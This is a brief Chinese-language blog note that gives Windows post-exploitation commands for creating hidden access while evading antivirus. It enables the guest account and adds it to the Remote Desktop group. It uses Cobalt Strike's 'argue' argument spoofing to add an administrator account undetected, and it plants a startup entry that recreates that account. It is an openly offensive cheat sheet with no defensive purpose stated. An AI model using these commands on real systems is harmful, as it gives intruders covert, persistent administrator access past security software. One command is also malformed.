scareing的学习笔记

道可道，非常道, 名可名，非常名!

Win绕过AV添加账号

发表于 2019-12-02 | 分类于 bypass

Win绕过AV添加账号

开启来宾用户

net user guest /active:yes

net user localgroup “Remote Desktop User” guest /add

由于无法直接添加管理员组，所以为了远程连接，添加到远程连接组

CS的argue命令参数污染。

argue net1 xxxxx

execute net1 user test /add

execute net1 localgroup administrators test /add

添加优先级高于AV的启动项

C:/windows/system32/cmd.exe /c net user test /add;net localgroup administrators test /add

本文作者： scareing
本文链接： https://github.com/scareing/scareing.github.io/2019/12/02/Win绕过AV添加账号/
版权声明： 本博客所有文章除特别声明外，均采用 CC BY-NC-SA 3.0 许可协议。转载请注明出处！